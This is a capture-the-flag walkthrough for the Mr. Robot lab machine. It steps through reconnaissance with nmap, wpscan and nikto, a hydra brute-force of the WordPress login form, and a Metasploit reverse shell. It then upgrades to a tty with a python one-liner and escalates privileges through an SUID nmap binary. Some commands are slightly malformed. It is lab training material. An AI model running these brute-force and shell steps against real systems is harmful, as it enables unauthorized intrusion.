Mr. Robot CTF Walkthrough
netdiscover -i wlan0 – To get the server address
nmap -O 192.168.1.108 – To scan the target and get info regarding the OS and services
Use web vulnerability scanners like Wpscan or Nikto to discover vulnerabilities.
wpscan –url 192.168.1.108
nikto -h 192.168.1.108
Capturing the first flag
Access the robots.txt file
Use the wget utility or burp suite to get the files and open the first key.
wget <IP> /fsocity.dic/key-1-of-3.txt
Optimizing the dictionary file
The dictionary file has many duplicates and needs to be optimized and sorted for maximum efficiency.
This will come in handy when we are performing a brute force/dictionary attack; as the attempts will be carried out in an ordered and as efficient as possible. Minimizing the cracking time and reducing the size of the dictionary file.
cat fsocity.dic| sort -u | uniq > Newfsocity.dic
Use wpscan and find the login page, we need the username and password, but luckily we have the dictionary file.
We need to intercept the requests being send and modify them to get the username.
we can do this using burp or zap, I am going to use burp.
We can stop the intercept, use the proxy and then turn on intercept and enter credentials and hit log in.
We can then intercept the post request and identify the fields we need to brute force.
We now need to use an online cracking tool, we can use hydra as it is the most powerful.
We are going to use the log and pwd fields.
The objective is to find the username first, we can then bruteforce the password after.
hydra -V -L fsocity.dic-p test 192.168.1.108 http-post-form ‘/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username’
This should work for most forms.
We are looking for the http post form, that shows us that a username exists
We can now use wpscan to crack the password, because it is faster for wordpress cracking
wpscan –url 192.168.1.108 –wordlist home/alexis/Desktop/fsocity.dic –username elliot
We can now log in and I am the admin so I can install plug ins like a file manager, I now need to maintain access and escalate my privileges , I can do this by using weevely for a backdoor and a reverse shell, or we can be smart and use metasploit which will do all the hard work for us and we can use meterpreter for a reverse connection
use and set options – username password rhost exploit
It is going to give us a meterpreter with a shell but with no tty (terminal)
We can then start a tty shell – terminal shell
Many people over complicate it by importing it with python.
python -c ‘import pty; pty.spawn(“/bin/sh”)’
We can check who we are logged in as.
key-2 and password.raw-md5
It is an md5 hashed password that we can crack with hashcat or because I am lazy crackstation.net.
login as robot and we now have the password so we can log in.
We can then view the 2nd key –
Ok we now need to get root access also known as privilege escalation
The only way in is by finding a file that has the super user ID bits (SUID)
We can use the find command
find / -perm -4000 2>/dev/null
It looks like we can use Nmap in root
Let’s see if we can run it in interactive mode which will allow us to use additional commands to get the root
sh! – to get in to root
id – and we are root!
Let’s go to the root folder and we get the last key.